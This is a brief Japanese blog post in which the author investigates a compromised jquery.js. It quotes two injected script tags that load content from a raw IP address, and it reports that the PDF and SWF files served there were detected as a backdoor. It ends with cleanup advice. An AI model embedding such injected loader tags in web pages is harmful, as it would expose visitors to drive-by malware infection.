続・頭の体操
昨日の続き。
wget で cookie と相手方の目をごまかすために UA を設定しみたら、こんなのが出ましたw
<script src=http://94.247.2.195/news/?id=2></script> <script src=http://94.247.2.195/news/?id=3></script>
よしよし。それではいただきます〜とばかりに wget でファイルを get。なんか PDF と swf なファイルですよ。
スキャンしてみたら、バッチリ引っかかりました。
Backdoor.Win32.Agent.afhg
どっかのサイトで同じ jquery.js 踏んづけて、うっかり ftp*1 しちゃって蓮抜かれてあぼ〜んて感じかな。
ウィルススキャンして、Windows Update、および Adobe Acrobat と Flash Player をうpでとして一丁上がりってなもんで*2。ちゃんちゃん。